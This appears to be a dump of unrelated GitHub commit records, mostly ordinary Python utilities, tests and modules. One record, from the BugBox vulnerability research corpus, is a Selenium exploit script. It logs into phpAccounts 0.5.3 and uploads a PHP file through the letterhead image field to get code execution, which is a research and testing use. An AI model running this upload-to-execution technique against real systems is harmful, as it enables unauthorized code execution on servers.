3c65f2c4d7e40d55f5afae22c7912bba7d3eef7b | add french version | twidi/pytimeago | pytimeago/french.py | pytimeago/french.py | # -*- coding: utf-8 -*-
# pytimeago -- library for rendering time deltas
# Copyright (C) 2006 Adomas Paltanavicius
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""French language for pytimeago.
$Id$
"""
halfstr = u' et demi'
pluralstr = u's'
def french(delta, **kw):
"""French language for pytimeago. There are no keywords supported.
First, load utilities for testing:
>>> from test import *
The function accepts delta in seconds:
>>> french(0)
u'\\xe0 l\'instant'
>>> french(20)
u'\\xe0 l\'instant'
If delta falls in range 1..58 minutes, it is said so:
>>> french(hours(0, 1))
u'il y a 1 minute'
>>> french(hours(0, 5))
u'il y a 5 minutes'
>>> french(hours(0, 58))
u'il y a 58 minutes'
>>> french(hours(0, 59))
u'il y a 1 heure'
If delta is less than 24 hours, it is reported in hours with half-
periods:
>>> french(hours(3))
u'il y a 3 heures'
>>> french(hours(12, 25))
u'il y a 12 heures et demi'
Next, if delta is less than 7 days, it reported just so.
>>> french(days(6))
u'il y a 6 jours'
And also use half-periods:
>>> french(days(4) + hours(11))
u'il y a 4 jours et demi'
Special case for 1 day:
>>> french(days(1))
u'hier'
Less than four weeks, we say so:
>>> french(weeks(1))
u'il y a 1 semaine'
>>> french(days(8))
u'il y a 1 semaine'
>>> french(days(13))
u'il y a 2 semaines'
>>> french(weeks(3))
u'il y a 3 semaines'
>>> french(days(17))
u'il y a 2 semaines et demi'
Less than a year, say it in months:
>>> french(weeks(4))
u'il y a 1 mois'
>>> french(days(40))
u'il y a 1 mois et demi'
>>> french(days(29))
u'il y a 1 mois'
>>> french(months(2))
u'il y a 2 mois'
>>> french(months(11))
u'il y a 11 mois'
>>> french(days(70))
u'il y a 2 mois et demi'
We go no further than years:
>>> french(years(2))
u'il y a 2 ans'
>>> french(months(12))
u'il y a 1 an'
"""
# Now
if delta < 30:
return u'à l\'instant'
# < 1 hour
mins = delta/60
if mins < 1: mins=1
if mins < 59:
plural = mins > 1 and pluralstr or u''
return u'il y a %d minute%s' % (mins, plural)
# < 1 day
hours, mins = divmod(mins, 60)
if hours < 1: hours = 1
if hours < 23:
# "half" is for 30 minutes in the middle of an hour
if 15 <= mins <= 45:
half = halfstr
else:
half = u''
if mins > 45:
hours += 1
plural = hours > 1 and pluralstr or u''
return u'il y a %d heure%s%s' % (hours, plural, half)
# < 7 days
hours += round(mins/60.)
days, hours = divmod(hours, 24)
if days == 1:
return u'hier'
if days < 7:
half = 6 <= hours <= 18 and halfstr or u''
if 6 <= hours <= 18:
half = halfstr
else:
half = u''
if hours > 18:
days += 1
plural = days > 1 and pluralstr or u''
return u'il y a %d jour%s%s' % (days, plural, half)
# < 4 weeks
days += round(hours/24.)
weeks, wdays = divmod(days, 7)
if 2 <= wdays <= 4:
half = halfstr
else:
half = u''
if wdays > 4:
weeks += 1
if weeks < 4: # So we don't get 4 weeks
plural = weeks > 1 and pluralstr or u''
return u'il y a %d semaine%s%s' % (weeks, plural, half)
# < year
months, days = divmod(days, 30)
if 10 <= days <= 20:
half = halfstr
else:
half = u''
if days > 20:
months += 1
if months < 12:
return u'il y a %d mois%s' % (months, half)
# Don't go further
years = round(months/12.)
plural = years > 1 and pluralstr or u''
return u'il y a %d an%s' % (years, plural)
# Doctest
if __name__ == '__main__':
import doctest
doctest.testmod()
| lgpl-2.1 | Python |
|
01653b1130934b809816f7a5ad3c4b8c73d8d411 | Add a tool to fix (some) errors reported by gn gen --check. | TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc | tools/gn_check_autofix.py | tools/gn_check_autofix.py | #!/usr/bin/env python
# Copyright (c) 2016 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
import os
import re
import shutil
import subprocess
import sys
import tempfile
from collections import defaultdict
TARGET_RE = re.compile(
r'(?P<indentation_level>\s*)\w*\("(?P<target_name>\w*)"\) {$')
class TemporaryDirectory(object):
def __init__(self):
self._closed = False
self._name = None
self._name = tempfile.mkdtemp()
def __enter__(self):
return self._name
def __exit__(self, exc, value, tb):
if self._name and not self._closed:
shutil.rmtree(self._name)
self._closed = True
def Run(cmd):
print 'Running:', ' '.join(cmd)
sub = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return sub.communicate()
def FixErrors(filename, missing_deps, deleted_sources):
with open(filename) as f:
lines = f.readlines()
fixed_file = ''
indentation_level = None
for line in lines:
match = TARGET_RE.match(line)
if match:
target = match.group('target_name')
if target in missing_deps:
indentation_level = match.group('indentation_level')
elif indentation_level is not None:
match = re.match(indentation_level + '}$', line)
if match:
line = ('deps = [\n' +
''.join(' "' + dep + '",\n' for dep in missing_deps[target]) +
']\n') + line
indentation_level = None
elif line.strip().startswith('deps'):
is_empty_deps = line.strip() == 'deps = []'
line = 'deps = [\n' if is_empty_deps else line
line += ''.join(' "' + dep + '",\n' for dep in missing_deps[target])
line += ']\n' if is_empty_deps else ''
indentation_level = None
if line.strip() not in deleted_sources:
fixed_file += line
with open(filename, 'w') as f:
f.write(fixed_file)
Run(['gn', 'format', filename])
def Rebase(base_path, dependency_path, dependency):
base_path = base_path.split(os.path.sep)
dependency_path = dependency_path.split(os.path.sep)
first_difference = None
shortest_length = min(len(dependency_path), len(base_path))
for i in range(shortest_length):
if dependency_path[i] != base_path[i]:
first_difference = i
break
first_difference = first_difference or shortest_length
base_path = base_path[first_difference:]
dependency_path = dependency_path[first_difference:]
return (os.path.sep.join((['..'] * len(base_path)) + dependency_path) +
':' + dependency)
def main():
deleted_sources = set()
errors_by_file = defaultdict(lambda: defaultdict(set))
with TemporaryDirectory() as tmp_dir:
mb_gen_command = ([
'tools/mb/mb.py', 'gen',
tmp_dir,
'--config-file', 'webrtc/build/mb_config.pyl',
] + sys.argv[1:])
mb_output = Run(mb_gen_command)
errors = mb_output[0].split('ERROR')[1:]
if mb_output[1]:
print mb_output[1]
return 1
for error in errors:
error = error.splitlines()
target_msg = 'The target:'
if target_msg not in error:
target_msg = 'It is not in any dependency of'
if target_msg not in error:
print '\n'.join(error)
continue
index = error.index(target_msg) + 1
path, target = error[index].strip().split(':')
if error[index+1] in ('is including a file from the target:',
'The include file is in the target(s):'):
dep = error[index+2].strip()
dep_path, dep = dep.split(':')
dep = Rebase(path, dep_path, dep)
path = os.path.join(path[2:], 'BUILD.gn')
errors_by_file[path][target].add(dep)
elif error[index+1] == 'has a source file:':
deleted_file = '"' + os.path.basename(error[index+2].strip()) + '",'
deleted_sources.add(deleted_file)
else:
print '\n'.join(error)
continue
for path, missing_deps in errors_by_file.items():
FixErrors(path, missing_deps, deleted_sources)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python |
|
7084442bb78098f05acbe3243231243543061bf6 | Create gloabl_moran.py | jamaps/arcpy_scripts | gloabl_moran.py | gloabl_moran.py | import arcpy
arcpy.env.workspace = r"C:\Users\allenje4\Desktop\GGRC32 Lab 4 Files\GGRC32 Lab 4 Files\Local Statistics Data"
m =
arcpy.SpatialAutocorrelation_stats("pop_sci.shp", "PDens2011","NO_REPORT", "CONTIGUITY_EDGES_CORNERS", "#",)
| mit | Python |
|
bbc208548f0dd381f3045d24db3c21c4c8ee004e | Test all sensors at once | mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky | grovepi/scan.py | grovepi/scan.py | import time
import grove_i2c_temp_hum_mini # temp + humidity
import hp206c # altitude + temp + pressure
import grovepi # used by air sensor and dust sensor
import atexit # used for the dust sensor
import json
# Initialize the sensors
t= grove_i2c_temp_hum_mini.th02()
h= hp206c.hp206c()
grovepi.dust_sensor_en()
air_sensor = 0
grovepi.pinMode(air_sensor,"INPUT")
atexit.register(grovepi.dust_sensor_dis)
ret=h.isAvailable()
if h.OK_HP20X_DEV == ret:
print "HP20x_dev is available."
else:
print "HP20x_dev isn't available."
while True:
temp = h.ReadTemperature()
temp2 = t.getTemperature()
pressure = h.ReadPressure()
altitude = h.ReadAltitude()
humidity = t.getHumidity()
air_quality = "--"
# try:
# # Get dust
# [new_val,lowpulseoccupancy] = grovepi.dustSensorRead()
# if new_val:
# print lowpulseoccupancy
# except IOError:
# print ("Error")
try:
# Get air quality
air_quality = grovepi.analogRead(air_sensor)
if air_quality > 700:
print ("High pollution")
elif air_quality > 300:
print ("Low pollution")
else:
print ("Air fresh")
print ("air_quality =", air_quality)
except IOError:
print ("Error")
# Send result
data = {
"air_quality": air_quality,
"humidity": humidity,
"temperature": (temp + temp2) / 2,
"pressure": pressure,
"altitude": altitude
}
print json.dumps(data)
# with open('./json/hsk1.json', 'wb') as f:
# f.write(json.dumps(voc))
time.sleep(.5) | mit | Python |
|
c834082c59abe6ae6d2e065e1a5afac2d399a612 | Add unittests for the bridgedb.crypto module. | mmaker/bridgedb,pagea/bridgedb,mmaker/bridgedb,wfn/bridgedb,pagea/bridgedb,wfn/bridgedb | lib/bridgedb/test/test_crypto.py | lib/bridgedb/test/test_crypto.py | # -*- coding: utf-8 -*-
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <isis@torproject.org>
# please also see AUTHORS file
# :copyright: (c) 2013, Isis Lovecruft
# (c) 2007-2013, The Tor Project, Inc.
# (c) 2007-2013, all entities within the AUTHORS file
# :license: 3-Clause BSD, see LICENSE for licensing information
"""Unittests for :mod:`bridgedb.crypto`."""
from __future__ import print_function
from __future__ import unicode_literals
import os
from twisted.trial import unittest
from bridgedb import crypto
SEKRIT_KEY = b'v\x16Xm\xfc\x1b}\x063\x85\xaa\xa5\xf9\xad\x18\xb2P\x93\xc6k\xf9'
SEKRIT_KEY += b'\x8bI\xd9\xb8xw\xf5\xec\x1b\x7f\xa8'
class CryptoTest(unittest.TestCase):
def test_getKey_nokey(self):
"""Test retrieving the secret_key from an empty file."""
filename = os.path.join(os.getcwd(), 'sekrit')
key = crypto.getKey(filename)
self.failUnlessIsInstance(key, basestring,
"key isn't a string! type=%r" % type(key))
def test_getKey_tmpfile(self):
"""Test retrieving the secret_key from a new tmpfile."""
filename = self.mktemp()
key = crypto.getKey(filename)
self.failUnlessIsInstance(key, basestring,
"key isn't a string! type=%r" % type(key))
def test_getKey_keyexists(self):
"""Write the example key to a file and test reading it back."""
filename = self.mktemp()
with open(filename, 'wb') as fh:
fh.write(SEKRIT_KEY)
fh.flush()
key = crypto.getKey(filename)
self.failUnlessIsInstance(key, basestring,
"key isn't a string! type=%r" % type(key))
self.assertEqual(SEKRIT_KEY, key,
"""The example key and the one read from file differ!
key (in hex): %s
SEKRIT_KEY (in hex): %s"""
% (key.encode('hex'), SEKRIT_KEY.encode('hex')))
| bsd-3-clause | Python |
|
8373de2daf5c44c069b9312ad3a3b21e2f5c21e3 | Implement channel mode +l | ElementalAlchemist/txircd,Heufneutje/txircd,DesertBus/txircd | txircd/modules/cmode_l.py | txircd/modules/cmode_l.py | from twisted.words.protocols import irc
from txircd.modbase import Mode
class LimitMode(Mode):
def checkSet(self, user, target, param):
intParam = int(param)
if str(intParam) != param:
return False
return (intParam >= 0)
def commandPermission(self, user, cmd, data):
if cmd != "JOIN":
return data
targetChannels = data["targetchan"]
keys = data["keys"]
removeChannels = []
for channel in targetChannels:
if "l" in channel.mode and len(channel.users) >= int(channel.mode["l"]):
user.sendMessage(irc.ERR_CHANNELISFULL, channel.name, ":Cannot join channel (Channel is full)")
removeChannels.append(channel)
for channel in removeChannels:
index = targetChannels.index(channel)
targetChannels.pop(index)
keys.pop(index)
data["targetchan"] = targetChannels
data["keys"] = keys
return data
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
def spawn(self):
return {
"modes": {
"cpl": LimitMode()
}
}
def cleanup(self):
self.ircd.removeMode("cpl") | bsd-3-clause | Python |
|
a24844a20634354167511163870438c36581c656 | Add py-hpack (#19189) | LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/py-hpack/package.py | var/spack/repos/builtin/packages/py-hpack/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyHpack(PythonPackage):
"""Pure-Python HPACK header compression"""
homepage = "https://github.com/python-hyper/hpack"
url = "https://pypi.io/packages/source/h/hpack/hpack-4.0.0.tar.gz"
version('4.0.0', sha256='fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095')
depends_on('py-setuptools', type='build')
depends_on('py-wheel', type='build')
| lgpl-2.1 | Python |
|
5ed57df8d1e3b85bc27d5a834c9ec35b18055ba9 | Create codility.py | maxmedina05/gossip-algo,maxmedina05/gossip-algo,maxmedina05/gossip-algo | codility.py | codility.py | #lesson 1
def solution(N):
bstr = dectoBin(N)
arr = []
cnt = 0
for b in bstr:
if b == '0':
cnt = cnt + 1
if b != '0':
arr.append(cnt)
cnt = 0
return getMax(arr)
def dectoBin(N):
bstr = ""
while N > 0:
bstr = str(N % 2) + bstr
N = N // 2
return bstr
def getMax(arr):
max = arr[0]
for i in range(len(arr)):
if arr[i] > max:
max = arr[i]
return max
solution(0)
| mit | Python |
|
955bca3beb7808636a586bed43c37e5f74fba17f | Add Weather class (use forecastio, geopy) - forecase(current/daily) | DongjunLee/kino-bot | kino/functions/weather.py | kino/functions/weather.py | # -*- coding: utf-8 -*-
import datetime
import forecastio
from geopy.geocoders import GoogleV3
from kino.template import MsgTemplate
from slack.slackbot import SlackerAdapter
from utils.config import Config
class Weather(object):
def __init__(self):
self.config = Config()
self.slackbot = SlackerAdapter()
self.template = MsgTemplate()
geolocator = GoogleV3()
self.location = geolocator.geocode(self.config.weather["HOME"])
api_key = self.config.weather["DARK_SKY_SECRET_KEY"]
lat = self.location.latitude
lon = self.location.longitude
self.forecastio = forecastio.load_forecast(api_key, lat, lon)
def read(self, when='current'):
if when == 'current':
self.__current_forecast()
elif when == 'daily':
self.__daily_forecast()
def __daily_forecast(self):
daily = self.forecastio.daily()
address = self.location.address
icon = daily.icon
summary = daily.summary
attachments = self.template.make_weather_template(address, icon, summary)
self.slackbot.send_message(attachments=attachments)
def __current_forecast(self):
current = self.forecastio.currently()
address = self.location.address
icon = current.icon
summary = current.summary
temperature = current.temperature
attachments = self.template.make_weather_template(address, icon, summary, temperature=temperature)
self.slackbot.send_message(attachments=attachments)
| mit | Python |
|
1005f983774392306ca10e5fb12b59eeb63a88c4 | add remote file inclusion exploit | UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox | framework/Exploits/OSVDB_82707_D.py | framework/Exploits/OSVDB_82707_D.py |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import framework
import time
import selenium.common.exceptions
class Exploit (framework.Exploit):
attributes = {'Name' : "OSVDB_82707D",
'Description' : "Upload and exec of php file using Letterhead img uplaod feature",
'References' : [['OSVDB','82707'],['http://www.osvdb.org/show/osvdb/82707']],
'Target' : "phpAccounts 0.5.3",
'TargetLicense' : '',
'Type' : "EXEC",
'VulWikiPage' : "",
'Privileged' : True
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
return
def setup(self, target_system_dir):
self.logger.info("Creating payload file")
fd = file("/tmp/phpinfoexploit.php", 'w')
fd.write("<?php\nphpinfo();\n?>")
fd.close()
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://127.0.0.1/phpaccounts/index.php")
driver.get_element(by_xpath="//input[@name='Login_Username']").send_keys("phpaccounts@umd.edu")
driver.get_element(by_xpath="//input[@name='Login_Password']").send_keys("phpaccountspw21")
driver.get_element(by_xpath="//input[@value='Login']").click()
driver.get_element(by_xpath="//frame[@name='leftFrame']")
driver.get("http://127.0.0.1//phpaccounts/index.php?page=tasks&action=preferences")
driver.get_element(by_xpath="//input[@name='letterhead_image']").send_keys("/tmp/phpinfoexploit.php")
driver.get_element(by_xpath="//input[@value='Save Changes']").click()
driver.cleanup()
return
def verify(self):
driver = self.create_selenium_driver()
driver.get("http://127.0.0.1/phpaccounts/users/1/phpinfoexploit.php")
try:
driver.get_element(by_xpath="//a[@href='http://www.php.net/']")
driver.cleanup()
self.logger.info("Payload executed")
return True
except selenium.common.exceptions.NoSuchElementException:
self.logger.error("Payload failed to execute")
driver.cleanup()
return False
| bsd-3-clause | Python |
|
2c1b393c347ffcf24d9584be800378a1b77fa86d | add example to test error handling | JohnLunzer/flexx,zoofIO/flexx,jrversteegh/flexx,JohnLunzer/flexx,zoofIO/flexx,JohnLunzer/flexx,jrversteegh/flexx | flexx/ui/examples/errors.py | flexx/ui/examples/errors.py | """
App that can be used to generate errors on the Python and JS side. These
errors should show tracebacks in the correct manner (and not crash the app
as in #164).
To test thoroughly, you should probably also set the foo and bar
properties from the Python and JS console.
"""
from flexx import app, event, ui
class Errors(ui.Widget):
def init(self):
with ui.VBox():
self.b1 = ui.Button(text='Raise error in JS property setter')
self.b2 = ui.Button(text='Raise error in JS event handler')
self.b3 = ui.Button(text='Raise error in Python property setter')
self.b4 = ui.Button(text='Raise error in Python event handler')
ui.Widget(flex=1) # spacer
class Both:
@event.prop
def foo(self, v=1):
return self.reciprocal(v)
def reciprocal(self, v):
return 1 / v
def raise_error(self):
raise RuntimeError('Deliberate error')
class JS:
@event.prop
def bar(self, v):
self.raise_error()
# Handlers for four buttons
@event.connect('b1.mouse_click')
def error_in_JS_prop(self, *events):
self.bar = 2
@event.connect('b2.mouse_click')
def error_in_JS_handler(self, *events):
self.raise_error()
@event.connect('b3.mouse_click')
def error_in_Py_prop(self, *events):
self.foo = 0
@event.connect('b4.mouse_click')
def error_in_Py_handler(self, *events):
self.raise_error()
if __name__ == '__main__':
m = app.launch(Errors)
app.run()
| bsd-2-clause | Python |
|
331308eedd37628f5419001fc48fc5a328c1bab9 | Add test_jsc | orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode | unnaturalcode/test_jsc.py | unnaturalcode/test_jsc.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
from check_jsc_syntax import checkJSCSyntax
from compile_error import CompileError
import unittest
ERROR_TEST = """if (process.argv.length < 3)
console.error("not enough args");
process.exit(1);
}
"""
class TestStringMethods(unittest.TestCase):
def test_syntax_ok(self):
toTest = checkJSCSyntax('a=1+2')
self.assertTrue(toTest is None)
def test_syntax_error(self):
toTest = checkJSCSyntax(ERROR_TEST)
self.assertTrue(isinstance (toTest[0], CompileError))
self.assertEqual(toTest[0].filename, 'toCheck.js')
self.assertEqual(toTest[0].line, 4)
self.assertEqual(toTest[0].column, None)
self.assertEqual(toTest[0].functionname, None)
self.assertEqual(toTest[0].text, 'Parser error')
self.assertEqual(toTest[0].errorname, 'SyntaxError')
if __name__ == '__main__':
unittest.main()
| agpl-3.0 | Python |
|
a6495a05d4652beeefca9e383f5dd7b8fc4246d7 | Create simple_fun_91:unique_digit_products.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/simple_fun_91:unique_digit_products.py | Solutions/simple_fun_91:unique_digit_products.py | from operator import mul
def unique_digit_products(a):
return len({reduce(mul, map(int, str(x))) for x in a})
| mit | Python |
|
371545ecae0296f9274319c971be1378c3dafbbe | Add migration | theirc/ServiceInfo,theirc/ServiceInfo,theirc/ServiceInfo,theirc/ServiceInfo,theirc/ServiceInfo-ircdeploy | services/migrations/0036_auto_20150327_1434.py | services/migrations/0036_auto_20150327_1434.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('services', '0035_auto_20150325_1637'),
]
operations = [
migrations.AddField(
model_name='jiraupdaterecord',
name='feedback',
field=models.ForeignKey(to='services.Feedback', null=True, related_name='jira_records', blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='jiraupdaterecord',
name='update_type',
field=models.CharField(max_length=22, choices=[('provider-change', 'Provider updated their information'), ('new-service', 'New service submitted by provider'), ('change-service', 'Change to existing service submitted by provider'), ('cancel-draft-service', 'Provider canceled a draft service'), ('cancel-current-service', 'Provider canceled a current service'), ('superseded-draft', 'Provider superseded a previous draft'), ('approve-service', 'Staff approved a new or changed service'), ('rejected-service', 'Staff rejected a new or changed service'), ('feedback', 'User submitted feedback')], verbose_name='update type'),
preserve_default=True,
),
]
| bsd-3-clause | Python |
|
7d061e698788a60f0e3b59559961408015d891ed | Add first iteration of message_producer | jdgillespie91/trackerSpend,jdgillespie91/trackerSpend | utils/message_producer.py | utils/message_producer.py | import argparse
import pika
def send_message(queue, body=None):
"""
Sends a message to the specified queue with specified body if applicable.
:param queue: Name of queue.
:type queue: str
:param body: Content of message body in the form "{'key': 'value'}".
:type body: str
"""
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue=queue)
channel.basic_publish(exchange='', routing_key=queue, body=body)
print(" [x] Message sent.")
print(" Queue: {0}".format(queue))
print(" Body: {0}".format(body))
connection.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send a message to the '
'specified queue.')
parser.add_argument('-q', '--queue', required=True,
help='The destination of the message')
parser.add_argument('-b', '--body', help='The message body, if applicable.')
args = parser.parse_args()
send_message(args.queue, args.body) | mit | Python |
|
49614576524e74cb2e8eaa6656c1e86bf546c8e6 | Create keystone_test.py | OpenAcademy-OpenStack/DorisXue | keystone_test.py | keystone_test.py | import keystoneclient.v2_0.client as ksclient
import novaclient.v1_1.client as nvclient
from novaclient import client as novaclient
import glanceclient
import os
def get_keystone_creds():
d = {}
d['username'] = 'admin'
d['password'] = 'password'
d['auth_url'] = 'http://10.0.2.15:5000/v2.0/'
d['tenant_name'] = 'demo'
return d
def get_nova_creds():
d = {}
d['username'] = 'admin'
d['api_key'] = 'password'
d['auth_url'] = 'http://10.0.2.15:5000/v2.0/'
d['project_id'] = 'demo'
return d
if __name__== "__main__":
keystone_creds = get_keystone_creds()
keystone = ksclient.Client(**keystone_creds)
nova_creds = get_nova_creds()
nova = nvclient.Client(**nova_creds)
#if not nova.keypairs.findall(name="mykey"):
# with open(os.path.expanduser('~/.ssh/id_rsa.pub')) as fpubkey:
# nova.keypairs.create(name="mykey", public_key=fpubkey.read())
glance_endpoint = keystone.service_catalog.url_for(service_type='image',
endpoint_type='publicURL')
glance = glanceclient.Client('1',glance_endpoint, token=keystone.auth_token)
images = glance.images.list()
for one_image in images:
if one_image.name.find('ubuntu') > -1:
print one_image.name
image = nova.images.find(name=one_image.name)
flavor = nova.flavors.find(name="m1.small")
instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor)
#instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor, key_name="mykey")
| apache-2.0 | Python |
|
6789f2ea1862f4c30e8d60bd0b47640b7e5835c1 | Add script to count labels in a data set | NLeSC/embodied-emotions-scripts,NLeSC/embodied-emotions-scripts | count_labels.py | count_labels.py | """Count HEEM labels in data set.
Usage: python count_labels.py <dir with train and test files>
"""
import codecs
from glob import glob
import numpy as np
import argparse
from collections import Counter
def load_data(data_file):
data = [ln.rsplit(None, 1) for ln in open(data_file)]
X_data, Y_data = zip(*data)
return X_data, Y_data
def count_labels(file_name, counter):
# load data set
X_data, Y_data = load_data(file_name)
Y = [s.split('_') for s in Y_data]
for labelset in Y:
counter.update(labelset)
del counter['None']
return counter
parser = argparse.ArgumentParser()
parser.add_argument('input_dir', help='the directory where the input text '
'files can be found.')
args = parser.parse_args()
train_file = '{}/train_1.txt'.format(args.input_dir)
test_file = '{}/test_1.txt'.format(args.input_dir)
labels = Counter()
labels = count_labels(train_file, labels)
labels = count_labels(test_file, labels)
for l, freq in labels.most_common():
print '{}\t{}'.format(l, freq)
| apache-2.0 | Python |
|
f1e08341a6b9f8bf137c1642debe3d3eda4b2cdf | Add utility to load env from config file | cancerregulome/gidget,cancerregulome/gidget,cancerregulome/gidget | gidget/util/load_path_config.py | gidget/util/load_path_config.py | #!/usr/bin/env python
import os
from os.path import join as pthJoin
from ConfigParser import SafeConfigParser
import sys
from pipeline_util import expandPath as pthExpanded
COMMANDS_DIR = 'commands'
# mini spec that maps from config lines to gidget env var names
# [ (section, [ (option_name, env_name) ] ) ]
optionMap = [
('maf', [
('TCGAMAF_OUTPUTS', 'TCGAMAF_OUTPUTS'),
('TCGAMAF_DATA_DIR', 'TCGAMAF_DATA_DIR'),
('TCGAMAF_REFERENCES_DIR', 'TCGAMAF_REFERENCES_DIR'),
]),
('binarization', [
('TCGABINARIZATION_DATABASE_DIR','TCGABINARIZATION_DATABASE_DIR'),
('TCGABINARIZATION_REFERENCES_DIR', 'TCGABINARIZATION_REFERENCES_DIR'),
]),
('fmp', [
('TCGAFMP_PYTHON3', 'TCGAFMP_PYTHON3'),
('TCGAFMP_BIOINFORMATICS_REFERENCES', 'TCGAFMP_BIOINFORMATICS_REFERENCES'),
('TCGAFMP_SCRATCH', 'TCGAFMP_SCRATCH'),
('TCGAFMP_DCC_REPOSITORIES', 'TCGAFMP_DCC_REPOSITORIES'),
('TCGAFMP_FIREHOSE_MIRROR', 'TCGAFMP_FIREHOSE_MIRROR'),
('TCGAFMP_PAIRWISE_ROOT', 'TCGAFMP_PAIRWISE_ROOT'),
('TCGAFMP_LOCAL_SCRATCH', 'TCGAFMP_LOCAL_SCRATCH'),
('TCGAFMP_CLUSTER_SCRATCH', 'TCGAFMP_CLUSTER_SCRATCH'),
('TCGAFMP_CLUSTER_HOME', 'TCGAFMP_CLUSTER_HOME'),
]),
('python', [
('TCGAMAF_PYTHON_BINARY', 'TCGAMAF_PYTHON_BINARY'),
]),
('tools', [
('TCGAMAF_TOOLS_DIR', 'TCGAMAF_TOOLS_DIR'),
('LD_LIBRARY_PATH', 'LD_LIBRARY_PATH'),
])]
# pth = path
# pthd = path to a directory
# apth = absolute path
def envFromConfigOrOs(pthConfig):
if pthConfig is None:
return os.environ
else:
return envFromConfig(pthConfig)
def envFromConfig(pthConfig):
parser = SafeConfigParser()
parser.read(pthConfig)
env = {}
pthdGidgetRoot = pthExpanded(parser.get('gidget', 'GIDGET_SOURCE_ROOT'))
pthdFmpRoot = pthJoin(pthdGidgetRoot, COMMANDS_DIR, 'feature_matrix_construction')
pthdMafRoot = pthJoin(pthdGidgetRoot, COMMANDS_DIR, 'maf_processing')
pthdMafScripts = pthdMafRoot
env['GIDGET_SOURCE_ROOT'] = pthdGidgetRoot
env['TCGAFMP_ROOT_DIR'] = pthdFmpRoot
env['TCGAMAF_ROOT_DIR'] = pthdMafRoot
env['TCGAMAF_SCRIPTS_DIR'] = pthdMafScripts
rgpthdAddToPypath = (
pthJoin(pthdGidgetRoot, 'gidget', 'util'),
pthJoin(pthdMafRoot, 'python'),
pthJoin(pthdFmpRoot, 'util'))
sys.path.append(rgpthdAddToPypath)
# we also need to add these to the PYTHONPATH variable to ensure that they are properly propagated to subprocesses
env['PYTHONPATH'] = ('%s:' * len(rgpthdAddToPypath)) % rgpthdAddToPypath + os.environ['PYTHONPATH']
for section in optionMap:
stSection = section[0]
options = section[1]
for option in options:
stOption = option[0]
stEnv = option[1]
pthOption = pthExpanded(parser.get(stSection, stOption))
env[stEnv] = pthOption
os.environ[stEnv] = pthOption
return env | mit | Python |
|
2c4a2368d2dc1c6ee910358fedd6e85cdf4f043a | Add test from jasmine-core | jasmine/jasmine-py,jasmine/jasmine-py,jasmine/jasmine-py | test/jasmine_core_test.py | test/jasmine_core_test.py | from pytest import raises
import pytest
import subprocess
from jasmine_core import Core
import os
import pkg_resources
notwin32 = pytest.mark.skipif("sys.platform == 'win32'")
@notwin32
def test_js_files():
files = [
'jasmine.js',
'jasmine-html.js',
'json2.js',
'boot.js'
]
assert Core.js_files() == files
def test_css_files():
